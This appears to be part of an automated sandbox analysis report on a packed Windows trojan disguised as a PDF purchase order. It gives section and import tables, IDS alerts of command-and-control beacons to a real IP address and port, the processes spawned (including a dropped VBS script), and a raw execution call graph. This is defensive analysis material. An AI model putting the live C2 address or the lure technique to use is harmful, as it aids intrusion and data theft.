                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                        Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                        UPX0 | 0x1000 | 0x115000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        UPX1 | 0x116000 | 0x55000 | 0x54400 | b800abcd27e641e5d9e2cb211185b8dc | False | 0.9884145493323442 | data | 7.936135213996723 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc | 0x16b000 | 0x93000 | 0x92600 | b914194c1693b0529a995e23738ea102 | False | 0.8552018840734416 | data | 7.740007351798353 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                        RT_ICON | 0x16b414 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
                        RT_ICON | 0x16b540 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m | English | Great Britain | 0.2649377593360996
                        RT_ICON | 0x16daec | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m | English | Great Britain | 0.3646810506566604
                        RT_ICON | 0x16eb98 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m | English | Great Britain | 0.5549645390070922
                        RT_ICON | 0x16f004 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 2834 x 2834 px/m | English | Great Britain | 0.18115257439773264
                        RT_ICON | 0x173230 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2834 x 2834 px/m | English | Great Britain | 0.0959718443156276
                        RT_STRING | 0xdca40 | 0x594 | empty | English | Great Britain | 0
                        RT_STRING | 0xdcfd4 | 0x68a | empty | English | Great Britain | 0
                        RT_STRING | 0xdd660 | 0x490 | empty | English | Great Britain | 0
                        RT_STRING | 0xddaf0 | 0x5fc | empty | English | Great Britain | 0
                        RT_STRING | 0xde0ec | 0x65c | empty | English | Great Britain | 0
                        RT_STRING | 0xde748 | 0x466 | empty | English | Great Britain | 0
                        RT_STRING | 0xdebb0 | 0x158 | empty | English | Great Britain | 0
                        RT_RCDATA | 0x183a5c | 0x791d4 | data | | | 1.0003245418114675
                        RT_GROUP_ICON | 0x1fcc34 | 0x4c | data | English | Great Britain | 0.8157894736842105
                        RT_GROUP_ICON | 0x1fcc84 | 0x14 | data | English | Great Britain | 1.15
                        RT_VERSION | 0x1fcc9c | 0xdc | data | English | Great Britain | 0.6181818181818182
                        RT_MANIFEST | 0x1fcd7c | 0x3b0 | ASCII text, with CRLF line terminators | English | Great Britain | 0.5116525423728814
                        DLL | Import
                        KERNEL32.DLL | LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
                        ADVAPI32.dll | AddAce
                        COMCTL32.dll | ImageList_Remove
                        COMDLG32.dll | GetSaveFileNameW
                        GDI32.dll | LineTo
                        IPHLPAPI.DLL | IcmpSendEcho
                        MPR.dll | WNetUseConnectionW
                        ole32.dll | CoGetObject
                        OLEAUT32.dll | VariantInit
                        PSAPI.DLL | GetProcessMemoryInfo
                        SHELL32.dll | DragFinish
                        USER32.dll | GetDC
                        USERENV.dll | LoadUserProfileW
                        UxTheme.dll | IsThemeActive
                        VERSION.dll | VerQueryValueW
                        WININET.dll | FtpOpenFileW
                        WINMM.dll | timeGetTime
                        WSOCK32.dll | socket
                        Language of compilation system | Country where language is spoken | Map
                        English | Great Britain |
                        Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                        2024-10-24T15:38:16.421517+0200 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.16 | 49714 | 172.111.138.100 | 5552 | TCP
                        2024-10-24T15:38:16.421517+0200 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.16 | 49716 | 172.111.138.100 | 5552 | TCP
                        2024-10-24T15:38:16.421517+0200 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.16 | 49708 | 172.111.138.100 | 5552 | TCP
                        2024-10-24T15:38:16.421517+0200 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.16 | 49715 | 172.111.138.100 | 5552 | TCP
                        2024-10-24T15:38:16.421517+0200 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.16 | 49711 | 172.111.138.100 | 5552 | TCP
                        2024-10-24T15:38:16.421517+0200 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.16 | 49713 | 172.111.138.100 | 5552 | TCP
                        2024-10-24T15:38:16.421517+0200 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.16 | 49710 | 172.111.138.100 | 5552 | TCP
                        2024-10-24T15:38:30.424583+0200 | 2822116 | ETPRO MALWARE Loda Logger CnC Beacon | 1 | 192.168.2.16 | 49708 | 172.111.138.100 | 5552 | TCP
                        2024-10-24T15:38:30.424583+0200 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.16 | 49708 | 172.111.138.100 | 5552 | TCP
                        2024-10-24T15:38:39.694626+0200 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.16 | 49709 | 172.111.138.100 | 5552 | TCP
                        2024-10-24T15:38:40.772870+0200 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.16 | 49709 | 172.111.138.100 | 5552 | TCP
                        2024-10-24T15:38:48.781841+0200 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.16 | 49710 | 172.111.138.100 | 5552 | TCP
                        2024-10-24T15:38:57.814205+0200 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.16 | 49711 | 172.111.138.100 | 5552 | TCP
                        2024-10-24T15:39:06.899902+0200 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.16 | 49713 | 172.111.138.100 | 5552 | TCP
                        2024-10-24T15:39:16.326030+0200 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.16 | 49714 | 172.111.138.100 | 5552 | TCP
                        2024-10-24T15:39:25.332704+0200 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.16 | 49715 | 172.111.138.100 | 5552 | TCP
                        2024-10-24T15:39:34.363167+0200 | 2822116 | ETPRO MALWARE Loda Logger CnC Beacon | 1 | 192.168.2.16 | 49716 | 172.111.138.100 | 5552 | TCP
                        2024-10-24T15:39:34.363167+0200 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.16 | 49716 | 172.111.138.100 | 5552 | TCP


                        Target ID:1
                        Start time:09:38:19
                        Start date:24/10/2024
                        Path:C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe"
                        Imagebase:0xc90000
                        File size:945'664 bytes
                        MD5 hash:A842353A8FD25A6B05D0D3CE6AFE8AAD
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000001.00000002.2485820292.0000000004D11000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:low
                        Has exited:false

                        Target ID:3
                        Start time:09:38:19
                        Start date:24/10/2024
                        Path:C:\Windows\SysWOW64\wscript.exe
                        Wow64 process (32bit):true
                        Commandline:WSCript C:\Users\user\AppData\Local\Temp\KKRBIX.vbs
                        Imagebase:0x380000
                        File size:147'456 bytes
                        MD5 hash:FF00E0480075B095948000BDC66E81F0
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000003.00000002.2476240013.0000000003460000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000003.00000002.2471256103.00000000030F7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000003.00000002.2471256103.00000000030D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:high
                        Has exited:false


                          Execution Graph

                          Execution Coverage:4.1%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:11.4%
                          Total number of Nodes:2000
                          Total number of Limit Nodes:36
108379 cf30ad 108092->108379 108433 cadd84 108092->108433 108436 cf804e 108092->108436 108450 cf798d 108092->108450 108455 ce9122 108092->108455 108469 c950a3 108092->108469 108474 c981c6 108092->108474 108544 caef0d 108092->108544 108587 cf10e5 108092->108587 108593 ce92c0 108092->108593 108611 caf03e 108092->108611 108614 ce8065 GetCursorPos GetForegroundWindow 108092->108614 108628 ce013f 108092->108628 108641 cf1f19 108092->108641 108644 ca1620 59 API calls Mailbox 108092->108644 108649 ceee52 82 API calls 2 library calls 108092->108649 108650 ceef9d 90 API calls Mailbox 108092->108650 108651 cdb020 48 API calls 108092->108651 108652 cee713 407 API calls Mailbox 108092->108652 108093->108092 108112->107962 108113->107995 108114->108007 108118 cb0112 __calloc_impl 108115->108118 108117 cb012c 108117->107969 108118->108117 108119 cb012e std::exception::exception 108118->108119 110090 cb45ec 108118->110090 110104 cb7495 RaiseException 108119->110104 108121 cb0158 110105 cb73cb 47 API calls _free 108121->110105 108123 cb016a 108123->107969 108125 c9d38b 108124->108125 108126 c9d3b4 108125->108126 110112 c9d772 55 API calls 108125->110112 108128 c9d2d2 108126->108128 108129 c9d30a 108128->108129 108130 c9d2df 108128->108130 108129->107956 108133 c9d2e6 108130->108133 110114 c9d349 53 API calls 108130->110114 108133->108129 110113 c9d349 53 API calls 108133->110113 108134->107959 108135->107937 108136->107960 108137->107960 108138->107960 108140 c9d8ac 108139->108140 108147 c9d8db Mailbox 108139->108147 108141 c9d8ff 108140->108141 108143 c9d8b2 Mailbox 108140->108143 108142 c9c935 48 API calls 108141->108142 108142->108147 108144 c9d8c7 108143->108144 108145 d04e9b 108143->108145 108146 d04e72 VariantClear 108144->108146 108144->108147 108145->108147 110115 cca599 InterlockedDecrement 108145->110115 108146->108147 108147->107973 108149->107999 108151 ca1606 108150->108151 108154 ca14b2 108150->108154 108151->108013 108152 ca14be 108157 ca14c9 108152->108157 110117 
c9346e 48 API calls 108152->110117 108154->108152 108155 cb010a 48 API calls 108154->108155 108156 d05299 108155->108156 108159 cb010a 48 API calls 108156->108159 108158 ca156d 108157->108158 108160 cb010a 48 API calls 108157->108160 108158->108013 108165 d052a4 108159->108165 108161 ca15af 108160->108161 108162 ca15c2 108161->108162 110116 cad6b4 48 API calls 108161->110116 108162->108013 108164 cb010a 48 API calls 108164->108165 108165->108152 108165->108164 108166->108002 108168 c984be 108167->108168 108182 c984ba 108167->108182 108169 d05592 __i64tow 108168->108169 108170 d05494 108168->108170 108171 c984d2 108168->108171 108178 c984ea __itow Mailbox _wcscpy 108168->108178 108172 d0557a 108170->108172 108173 d0549d 108170->108173 110118 cb234b 80 API calls 4 library calls 108171->110118 110119 cb234b 80 API calls 4 library calls 108172->110119 108173->108178 108179 d054bc 108173->108179 108175 cb010a 48 API calls 108177 c984f4 108175->108177 108181 c9caee 48 API calls 108177->108181 108177->108182 108178->108175 108180 cb010a 48 API calls 108179->108180 108183 d054d9 108180->108183 108181->108182 108182->108024 108184 cb010a 48 API calls 108183->108184 108185 d054ff 108184->108185 108185->108182 108186 c9caee 48 API calls 108185->108186 108186->108182 108187->108030 108189 c9cad0 108188->108189 108190 c9ca9a 108188->108190 108191 c9cad9 108189->108191 108192 c9cae3 108189->108192 108195 cb010a 48 API calls 108190->108195 108193 c97e53 48 API calls 108191->108193 108194 c9c4cd 48 API calls 108192->108194 108199 c9cac6 108193->108199 108194->108199 108196 c9caad 108195->108196 108197 d04f11 108196->108197 108198 c9cab8 108196->108198 108197->108199 108200 c9d3d2 48 API calls 108197->108200 108198->108199 108201 c9caee 48 API calls 108198->108201 108199->107977 108200->108199 108201->108199 108202->107983 108203->107969 108205 c9c948 108204->108205 108206 c9c940 108204->108206 108205->107965 108207 c9d805 48 API calls 108206->108207 108207->108205 108208->107975 
108209->107994 108210->107969 108211->107969 108212->107998 108213->107981 108214->107992 108215->107969 108216->108040 108217->108044 108218->108051 108219->108043 108221 c9f708 108220->108221 108226 c9f77b 108220->108226 108222 d0c4d5 108221->108222 108223 c9f712 108221->108223 108228 d0c4e2 108222->108228 108229 d0c4f4 108222->108229 108224 c9f71c 108223->108224 108241 d0c544 108223->108241 108234 d0c6a4 108224->108234 108240 c9f72a 108224->108240 108287 c9f741 108224->108287 108225 c9fa40 407 API calls 108273 c9f787 108225->108273 108227 d0c253 108226->108227 108226->108273 108682 cdd520 86 API calls 4 library calls 108227->108682 108659 cef34f 108228->108659 108687 cec235 407 API calls Mailbox 108229->108687 108230 d0c585 108242 d0c590 108230->108242 108243 d0c5a4 108230->108243 108237 c9c935 48 API calls 108234->108237 108235 d0c264 108235->108092 108236 d0c507 108239 d0c50b 108236->108239 108236->108287 108237->108287 108688 cdd520 86 API calls 4 library calls 108239->108688 108240->108287 108786 cca599 InterlockedDecrement 108240->108786 108241->108230 108252 d0c569 108241->108252 108245 cef34f 407 API calls 108242->108245 108690 ced154 48 API calls 108243->108690 108245->108287 108247 d0c45a 108251 c9c935 48 API calls 108247->108251 108249 d0c7b5 108256 d0c7eb 108249->108256 108788 ceef9d 90 API calls Mailbox 108249->108788 108250 d0c5af 108263 d0c62c 108250->108263 108275 d0c5d1 108250->108275 108251->108287 108689 cdd520 86 API calls 4 library calls 108252->108689 108255 c9f84a 108260 d0c32a 108255->108260 108270 c9f854 108255->108270 108257 c9d89e 50 API calls 108256->108257 108289 c9f770 Mailbox 108257->108289 108259 d0c793 108262 c984a6 81 API calls 108259->108262 108683 c9342c 48 API calls 108260->108683 108278 d0c79b __wsetenvp 108262->108278 108713 cdafce 48 API calls 108263->108713 108264 d0c7c9 108269 c984a6 81 API calls 108264->108269 108266 c9f8bb 108266->108235 108266->108247 108266->108287 108684 cca599 InterlockedDecrement 108266->108684 
108686 cef4df 407 API calls 108266->108686 108267 ca14a0 48 API calls 108272 c9f8ab 108267->108272 108268 cb2241 48 API calls 108268->108273 108282 d0c7d1 __wsetenvp 108269->108282 108270->108267 108272->108266 108276 c9f9d8 108272->108276 108273->108225 108273->108255 108273->108266 108273->108268 108273->108276 108273->108289 108691 cda485 48 API calls 108275->108691 108685 cdd520 86 API calls 4 library calls 108276->108685 108277 d0c63e 108714 cadf08 48 API calls 108277->108714 108278->108249 108280 c9d89e 50 API calls 108278->108280 108280->108249 108282->108256 108283 c9d89e 50 API calls 108282->108283 108283->108256 108284 d0c647 Mailbox 108715 cda485 48 API calls 108284->108715 108285 d0c5f6 108692 ca44e0 108285->108692 108287->108249 108287->108289 108787 ceee52 82 API calls 2 library calls 108287->108787 108289->108092 108290 d0c663 108716 ca3680 108290->108716 108293 c9ca8e 48 API calls 108292->108293 108294 ceb7a3 CoInitialize 108293->108294 108295 ceb7ae CoUninitialize 108294->108295 108296 ceb7b4 108294->108296 108295->108296 108297 ceb7d5 108296->108297 108298 c9ca8e 48 API calls 108296->108298 108299 ceb81b 108297->108299 108301 c984a6 81 API calls 108297->108301 108298->108297 108300 c984a6 81 API calls 108299->108300 108302 ceb827 108300->108302 108303 ceb7ef 108301->108303 108306 ceb9d3 SetErrorMode CoGetInstanceFromFile 108302->108306 108317 ceb861 108302->108317 109593 cca857 CLSIDFromProgID ProgIDFromCLSID lstrcmpiW CoTaskMemFree CLSIDFromString 108303->109593 108305 ceb802 108305->108299 108307 ceb807 108305->108307 108309 ceba1f CoGetObject 108306->108309 108310 ceba19 SetErrorMode 108306->108310 109594 cec235 407 API calls Mailbox 108307->109594 108308 ceb8a8 GetRunningObjectTable 108312 ceb8b8 108308->108312 108313 ceb8cb 108308->108313 108309->108310 108315 cebaa8 108309->108315 108330 ceb9b1 108310->108330 108312->108313 108332 ceb8ed 108312->108332 109595 cec235 407 API calls Mailbox 108313->109595 109599 cec235 407 API calls Mailbox 
108315->109599 108317->108308 108321 ceb89a 108317->108321 108324 c9cdb4 48 API calls 108317->108324 108319 cebad0 VariantClear 108319->108092 108320 ceb814 Mailbox 108320->108319 108321->108308 108322 cebac2 SetErrorMode 108322->108320 108323 ceba53 108325 ceba6f 108323->108325 109597 ccac4b 51 API calls Mailbox 108323->109597 108328 ceb88a 108324->108328 109598 cda6f6 103 API calls 108325->109598 108328->108321 108329 c9cdb4 48 API calls 108328->108329 108329->108321 108330->108315 108330->108323 108332->108330 109596 ccac4b 51 API calls Mailbox 108332->109596 108334 c984a6 81 API calls 108333->108334 108335 cf17c7 108334->108335 108336 cd6f5b 63 API calls 108335->108336 108337 cf17d8 108336->108337 108337->108092 108339 caf47f 108338->108339 108340 caf48a 108338->108340 108341 c9cdb4 48 API calls 108339->108341 108343 c984a6 81 API calls 108340->108343 108374 caf498 Mailbox 108340->108374 108341->108340 108342 cb010a 48 API calls 108344 caf49f 108342->108344 108346 d06841 108343->108346 108345 caf4af 108344->108345 109600 c95080 49 API calls 108344->109600 108349 c984a6 81 API calls 108345->108349 108348 cb297d __wsplitpath 47 API calls 108346->108348 108350 d06859 108348->108350 108351 caf4bf 108349->108351 108352 c9caee 48 API calls 108350->108352 108353 c94bf9 56 API calls 108351->108353 108354 d0686a 108352->108354 108355 caf4ce 108353->108355 109607 c939e8 48 API calls 2 library calls 108354->109607 108357 d068d4 GetLastError 108355->108357 108369 caf4d6 108355->108369 108358 d068ed 108357->108358 108358->108369 109609 c94592 CloseHandle 108358->109609 108359 d06895 108361 c9cdb4 48 API calls 108359->108361 108360 d06878 108360->108359 109608 cd6f4b GetFileAttributesW FindFirstFileW FindClose 108360->109608 108361->108374 108362 d06920 108367 cb010a 48 API calls 108362->108367 108363 caf4f0 108366 cb010a 48 API calls 108363->108366 108365 d06888 108365->108359 108372 cd6d6d 52 API calls 108365->108372 108370 caf4f5 108366->108370 108371 d06925 
108367->108371 108369->108362 108369->108363 109601 c9197e 108370->109601 108372->108359 108374->108342 108375 caf50a Mailbox 108374->108375 108375->108092 109610 cef79f 108376->109610 108378 cf0c0a 108378->108092 108380 c9ca8e 48 API calls 108379->108380 108381 cf30ca 108380->108381 108382 c9d3d2 48 API calls 108381->108382 108383 cf30d3 108382->108383 108384 c9d3d2 48 API calls 108383->108384 108385 cf30dc 108384->108385 108386 c9d3d2 48 API calls 108385->108386 108387 cf30e5 108386->108387 108388 c984a6 81 API calls 108387->108388 108389 cf30f4 108388->108389 108390 cf3d7b 48 API calls 108389->108390 108391 cf3128 108390->108391 108392 cf3af7 49 API calls 108391->108392 108393 cf3159 108392->108393 108394 cf319c RegOpenKeyExW 108393->108394 108395 cf3172 RegConnectRegistryW 108393->108395 108403 cf315d Mailbox 108393->108403 108397 cf31f7 108394->108397 108398 cf31c5 108394->108398 108395->108394 108395->108403 108399 c984a6 81 API calls 108397->108399 108401 cf31d9 RegCloseKey 108398->108401 108398->108403 108400 cf3207 RegQueryValueExW 108399->108400 108402 cf323e 108400->108402 108426 cf3229 108400->108426 108401->108403 108404 cf344c 108402->108404 108405 cf3265 108402->108405 108402->108426 108403->108092 108406 cb010a 48 API calls 108404->108406 108408 cf326e 108405->108408 108409 cf33d9 108405->108409 108410 cf3464 108406->108410 108407 cf34eb RegCloseKey 108407->108403 108411 cf34fe RegCloseKey 108407->108411 108413 cf338d 108408->108413 108414 cf3279 108408->108414 109707 cdad14 48 API calls _memset 108409->109707 108418 c984a6 81 API calls 108410->108418 108411->108403 108417 c984a6 81 API calls 108413->108417 108415 cf32de 108414->108415 108416 cf327e 108414->108416 108421 cb010a 48 API calls 108415->108421 108424 c984a6 81 API calls 108416->108424 108416->108426 108420 cf33a1 RegQueryValueExW 108417->108420 108422 cf3479 RegQueryValueExW 108418->108422 108419 cf33e4 108423 c984a6 81 API calls 108419->108423 108420->108426 108425 cf32f7 108421->108425 
108422->108426 108432 cf3331 108422->108432 108427 cf33f6 RegQueryValueExW 108423->108427 108428 cf329f RegQueryValueExW 108424->108428 108429 c984a6 81 API calls 108425->108429 108426->108407 108427->108407 108427->108426 108428->108426 108430 cf330c RegQueryValueExW 108429->108430 108430->108426 108430->108432 108431 c9ca8e 48 API calls 108431->108426 108432->108431 109708 cadd92 GetFileAttributesW 108433->109708 109713 c919ee 108436->109713 108441 cf806f 108444 c9ca8e 48 API calls 108441->108444 108442 cf8091 108443 c9d3d2 48 API calls 108442->108443 108445 cf809a 108443->108445 108449 cf808f Mailbox 108444->108449 109739 cce2e8 108445->109739 108447 cf80aa 109756 c97bef 108447->109756 108449->108092 108451 c919ee 83 API calls 108450->108451 108452 cf799b 108451->108452 108453 c91dce 107 API calls 108452->108453 108454 cf79a4 108453->108454 108454->108092 108456 c984a6 81 API calls 108455->108456 108457 ce913f 108456->108457 108458 c9cdb4 48 API calls 108457->108458 108459 ce9149 108458->108459 109881 ceacd3 108459->109881 108461 ce9156 108462 ce915a socket 108461->108462 108466 ce9182 108461->108466 108463 ce916d WSAGetLastError 108462->108463 108464 ce9184 connect 108462->108464 108463->108466 108465 ce91a3 WSAGetLastError 108464->108465 108464->108466 109887 cdd7e4 108465->109887 108466->108092 108468 ce91b8 closesocket 108468->108466 108470 cb010a 48 API calls 108469->108470 108471 c950b3 108470->108471 108472 c950ec CloseHandle 108471->108472 108473 c950be 108472->108473 108473->108092 108475 c984a6 81 API calls 108474->108475 108476 c981e5 108475->108476 108477 c984a6 81 API calls 108476->108477 108478 c981fa 108477->108478 108479 c984a6 81 API calls 108478->108479 108480 c9820d 108479->108480 108481 c984a6 81 API calls 108480->108481 108482 c98223 108481->108482 108483 c97b6e 48 API calls 108482->108483 108484 c98237 108483->108484 108485 c9846a 108484->108485 108486 c9cdb4 48 API calls 108484->108486 108489 d0d91e 108485->108489 108490 d0d95f 
108485->108490 108487 c9825e 108486->108487 108487->108485 108488 d0d752 108487->108488 108508 c98281 __wopenfile 108487->108508 108491 c93320 48 API calls 108488->108491 108493 c93320 48 API calls 108489->108493 108492 c93320 48 API calls 108490->108492 108494 d0d769 108491->108494 108495 d0d96a 108492->108495 108496 d0d928 108493->108496 108499 ca2320 50 API calls 108494->108499 108507 d0d790 108494->108507 108497 ca2320 50 API calls 108495->108497 108498 c984a6 81 API calls 108496->108498 108501 d0d985 108497->108501 108502 d0d93a 108498->108502 108499->108507 108500 c984a6 81 API calls 108503 c98306 108500->108503 108511 c984a6 81 API calls 108501->108511 108505 c980ea 48 API calls 108502->108505 108506 c984a6 81 API calls 108503->108506 108504 c980ea 48 API calls 108504->108507 108509 d0d94e 108505->108509 108510 c9831b 108506->108510 108507->108504 108512 c98182 48 API calls 108507->108512 108518 ca2320 50 API calls 108507->108518 108530 c9843f Mailbox 108507->108530 108508->108485 108508->108500 108516 d0d7ed 108508->108516 108539 c98364 108508->108539 108513 c98182 48 API calls 108509->108513 108510->108485 108515 c98342 108510->108515 108510->108516 108514 d0d9a0 108511->108514 108512->108507 108528 d0d95c 108513->108528 108517 c980ea 48 API calls 108514->108517 108519 c93320 48 API calls 108515->108519 108516->108485 108521 c93320 48 API calls 108516->108521 108520 d0d9b4 108517->108520 108518->108507 108523 c9834c 108519->108523 108524 c98182 48 API calls 108520->108524 108525 d0d84a 108521->108525 108522 ca2320 50 API calls 108522->108530 108527 c9c4cd 48 API calls 108523->108527 108524->108528 108529 ca2320 50 API calls 108525->108529 108527->108539 108528->108522 108529->108539 108530->108092 108533 d0d895 108534 d0d8ce 108533->108534 108535 d0d8bf 108533->108535 108536 c98182 48 API calls 108534->108536 109928 c9bd2f 48 API calls _memmove 108535->109928 108538 d0d8dc 108536->108538 108540 ca2320 50 API calls 108538->108540 108539->108530 
108539->108533 109902 c980ea 108539->109902 109914 c98182 108539->109914 109917 ca2320 108539->109917 109927 cb247b 59 API calls 3 library calls 108539->109927 108541 d0d8ee 108540->108541 108543 c9c4cd 48 API calls 108541->108543 108543->108485 108545 c9ca8e 48 API calls 108544->108545 108546 caef25 108545->108546 108547 caeffb 108546->108547 108548 caef3e 108546->108548 108549 cb010a 48 API calls 108547->108549 109953 caf0f3 48 API calls 108548->109953 108552 caf002 108549->108552 108551 caef4d 108555 caef73 108551->108555 108556 d06942 108551->108556 108560 c9cdb4 48 API calls 108551->108560 108557 caf00e 108552->108557 109955 c95080 49 API calls 108552->109955 108554 c984a6 81 API calls 108558 caf01c 108554->108558 108559 caf03e 2 API calls 108555->108559 108556->108092 108557->108554 108562 c94bf9 56 API calls 108558->108562 108563 caef7a 108559->108563 108561 d06965 108560->108561 108561->108555 108564 d0696d 108561->108564 108565 caf02b 108562->108565 108566 d06980 108563->108566 108567 caef87 108563->108567 108568 c9cdb4 48 API calls 108564->108568 108565->108551 108569 d06936 108565->108569 108570 cb010a 48 API calls 108566->108570 108571 c9d3d2 48 API calls 108567->108571 108568->108563 108569->108556 109956 c94592 CloseHandle 108569->109956 108572 d06986 108570->108572 108573 caef8f 108571->108573 108574 d0699f 108572->108574 109957 c93d65 ReadFile SetFilePointerEx 108572->109957 109930 caf04e 108573->109930 108581 d069a3 _memmove 108574->108581 109958 cdad14 48 API calls _memset 108574->109958 108578 caef9e 108580 c97bef 48 API calls 108578->108580 108578->108581 108582 caefb2 Mailbox 108580->108582 108583 caeff2 108582->108583 108584 c950ec CloseHandle 108582->108584 108583->108092 108585 caefe4 108584->108585 109954 c94592 CloseHandle 108585->109954 108588 c984a6 81 API calls 108587->108588 108589 cf10fb LoadLibraryW 108588->108589 108590 cf110f 108589->108590 108591 cf111e 108589->108591 108590->108092 108591->108590 109982 cf28d9 48 API calls 
_memmove 108591->109982 108594 c9a6d4 48 API calls 108593->108594 108595 ce92d2 108594->108595 108596 c984a6 81 API calls 108595->108596 108597 ce92e1 108596->108597 108598 caf26b 50 API calls 108597->108598 108599 ce92ed gethostbyname 108598->108599 108600 ce931d _memmove 108599->108600 108601 ce92fa WSAGetLastError 108599->108601 108603 ce932d inet_ntoa 108600->108603 108602 ce930e 108601->108602 108604 c9ca8e 48 API calls 108602->108604 109983 ceadca 48 API calls 2 library calls 108603->109983 108610 ce931b Mailbox 108604->108610 108606 ce9342 109984 ceae5a 50 API calls 108606->109984 108608 ce934e 108609 c97bef 48 API calls 108608->108609 108609->108610 108610->108092 108612 caf0b5 2 API calls 108611->108612 108613 caf046 108612->108613 108613->108092 109985 ce6b19 108614->109985 108617 ce80a5 108618 c93320 48 API calls 108617->108618 108619 ce80b3 108618->108619 108620 ca2320 50 API calls 108619->108620 108623 ce80cf 108620->108623 108621 ce8102 108622 c9cdb4 48 API calls 108621->108622 108627 ce80f5 108621->108627 108624 ce812b 108622->108624 108625 ca2320 50 API calls 108623->108625 108626 c9cdb4 48 API calls 108624->108626 108624->108627 108625->108627 108626->108627 108627->108092 108629 ce015e 108628->108629 108630 ce0157 108628->108630 108631 c984a6 81 API calls 108629->108631 108632 c984a6 81 API calls 108630->108632 108631->108630 108633 ce017c 108632->108633 109990 cd76db GetFileVersionInfoSizeW 108633->109990 108635 ce018d 108636 ce0192 108635->108636 108638 ce01a3 _wcscmp 108635->108638 108637 c9ca8e 48 API calls 108636->108637 108640 ce01a1 108637->108640 108639 c9ca8e 48 API calls 108638->108639 108639->108640 108640->108092 110006 cf23c5 108641->110006 108644->108092 108646 c9cafd __wsetenvp _memmove 108645->108646 108647 cb010a 48 API calls 108646->108647 108648 c9cb3b 108647->108648 108648->108091 108649->108092 108650->108092 108651->108092 108652->108092 108653->108091 108654->108085 108655->108066 108656->108063 108657->108071 108658->108079 
